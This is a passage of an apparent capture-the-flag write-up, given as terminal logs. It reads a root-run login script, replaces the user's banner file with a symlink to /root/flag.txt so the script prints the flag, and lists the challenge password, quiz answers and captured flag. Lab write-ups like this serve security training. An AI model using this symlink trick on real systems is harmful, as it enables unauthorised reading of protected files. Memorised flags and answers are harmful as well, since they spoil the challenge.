drwxr-xr-x   1 root   root  22 Apr 19 18:54 run 

drwxr-xr-x   1 root   root  25 Apr 19 18:54 sbin 

drwxr-xr-x   2 root   root   6 May 30  2023 srv 

dr-xr-xr-x  13 nobody nogroup 0 Apr 19 18:54 sys 

drwxrwxrwt   1 root   root   6 Mar  9 16:39 tmp 

drwxr-xr-x   1 root   root  18 May 30  2023 usr 

drwxr-xr-x   1 root   root  17 May 30  2023 var 

player@challenge:/$ cd root 

cd root 

player@challenge:/root$ ls -al 

ls -al 

total 16 

drwxr-xr-x 1 root root 6 Mar  9 16:39 . 

drwxr-xr-x 1 root root   29 Apr 19 18:54 .. 

-rw-r--r-- 1 root root 3106 Apr  9  2018 .bashrc 

-rw-r--r-- 1 root root  148 Aug 17  2015 .profile 

-rwx------ 1 root root   46 Mar  9 16:39 flag.txt 

-rw-r--r-- 1 root root 1317 Feb  7 17:25 script.py 

player@challenge:/root$ cat flag.txt 

cat flag.txt 

cat: flag.txt: Permission denied 

player@challenge:/root$ cat script.py 

cat script.py 

import os 

import pty 

incorrect_ans_reply = "Lol, good try, try again and good luck\n" 

if __name__ == "__main__": 

try: 

   with open("/home/player/banner", "r") as f: 

     print(f.read()) 

except: 

   print("*********************************************") 

   print("***************DEFAULT BANNER****************") 

   print("*Please supply banner in /home/player/banner*") 

   print("*********************************************") 

try: 

request = input("what is the password? \n").upper() 

while request: 

     if request == 'MY_PASSW@RD_@1234': 

         text = input("What is the top cyber security conference in the world?\n").upper() 

         if text == 'DEFCON' or text == 'DEF CON': 

             output = input( 

                 "the first hacker ever was known for phreaking(making free phone calls), who was it?\n").upper() 

             if output == 'JOHN DRAPER' or output == 'JOHN THOMAS DRAPER' or output == 'JOHN' or output== 'DRAPER': 

                    scmd = 'su - player' 

                    pty.spawn(scmd.split(' ')) 

             else: 

                 print(incorrect_ans_reply) 

         else: 

             print(incorrect_ans_reply) 

     else: 

         print(incorrect_ans_reply) 

         break 

except: 

    KeyboardInterrupt 

player@challenge:/root$ who 

who 

player@challenge:/root$ whoami 

whoami 

player 

player@challenge:/root$ cd 

cd 

player@challenge:~$ ls -al 

ls -al 

total 20 

drwxr-xr-x 1 player player   20 Mar  9 16:39 . 

drwxr-xr-x 1 root   root 20 Mar  9 16:39 .. 

-rw-r--r-- 1 player player  220 Apr  4  2018 .bash_logout 

-rw-r--r-- 1 player player 3771 Apr  4  2018 .bashrc 

-rw-r--r-- 1 player player  807 Apr  4  2018 .profile 

-rw-r--r-- 1 player player  114 Feb  7 17:25 banner 

-rw-r--r-- 1 root   root 13 Feb  7 17:25 text 

So /root/flag.txt is only accessible for root. Read the script.py and you can see this is the script running when user login. It will display banner file content. So, what is we replace that banner file with flag.txt so it will show the content of flag.txt? 

player@challenge:~$ rm banner 

rm banner 

player@challenge:~$ ln -s /root/flag.txt banner 

ln -s /root/flag.txt banner 

player@challenge:~$ exit 

exit 

logout 

What is the top cyber security conference in the world? 

DEF CON 

the first hacker ever was known for phreaking(making free phone calls), who was it? 

John Draper 

player@challenge:~$                                                                               

┌──(kali㉿kali)-[~] 

└─$ nc tethys.picoctf.net 63833 

picoCTF{b4nn3r_gr4bb1n9_su((3sfu11y_b3ee718e} 

what is the password?  

picoCTF{b4nn3r_gr4bb1n9_su((3sfu11y_b3ee718e}